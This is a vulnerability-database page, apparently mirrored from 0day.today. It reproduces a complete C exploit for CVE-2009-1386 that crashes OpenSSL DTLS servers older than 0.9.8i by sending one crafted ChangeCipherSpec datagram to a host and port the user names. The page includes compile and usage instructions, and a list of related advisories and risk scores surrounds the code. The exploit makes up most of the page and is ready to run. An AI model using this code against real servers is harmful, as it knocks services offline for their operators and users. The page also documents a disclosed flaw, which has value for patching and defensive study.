OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit

🗓️ 04 Jun 2009 00:00:00Reported by Jon OberheideType

zdt🔗 0day.today👁 42 Views

Open SSL 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploi

Reporter	Title	Published	Views	Family All 200
0day.today	OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS	18 May 200900:00	–	zdt
ALT Linux	Security fix for the ALT Linux 9 package openssl1.1 version 0.9.8m-alt1	26 Feb 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 8 package openssl10 version 0.9.8m-alt1	26 Feb 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 6 package openssl10 version 0.9.8m-alt1	26 Feb 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 8 package openssl10 version 0.9.8k-alt2	21 May 200900:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 9 package openssl1.1 version 0.9.8k-alt2	21 May 200900:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 9 package openssl10 version 0.9.8m-alt1	26 Feb 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 9 package openssl10 version 0.9.8k-alt2	21 May 200900:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 6 package openssl10 version 0.9.8k-alt2	21 May 200900:00	–	altlinux
BDU FSTEC	Vulnerabilities of the Gentoo Linux operating system, which allow a remote attacker to compromise the integrity and accessibility of protected information	28 Apr 201500:00	–	bdu_fstec

=========================================================
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
=========================================================



/*
 * cve-2009-1386.c
 *
 * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
 *
 *   OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as
 *   the first record instead of ClientHello.
 *
 * Usage:
 *
 *   Pass the host and port of the target DTLS server:
 *
 *   $ gcc cve-2009-1386.c -o cve-2009-1386
 *   $ ./cve-2009-1386 1.2.3.4 666
 *
 * Notes:
 *
 *   Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this 
 *   only requires a single ChangeCipherSpec datagram, but affects an older 
 *   version of OpenSSL.
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>

int
main(int argc, char **argv)
{
	int sock, ret;
	char *ptr, *err;
	struct hostent *h;
	struct sockaddr_in target;
	char buf[64];

	if (argc < 3) {
		err = "Pass the host and port of the target DTLS server";
		printf("[-] Error: %s\n", err);
		exit(1);
	}

	h = gethostbyname(argv[1]);
	if (!h) {
		err = "Unknown host specified";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	target.sin_family = h->h_addrtype;
	memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
	target.sin_port = htons(atoi(argv[2]));

	sock = socket(AF_INET, SOCK_DGRAM, 0);
	if (sock == -1) {
		err = "Failed creating UDP socket";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
	if (ret == -1) {
		err = "Failed to connect socket";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14);

	printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]);

	send(sock, buf, 14, 0);

	close(sock);

	return 0;
}



#  0day.today [2018-01-02]  #

04 Jun 2009 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.47628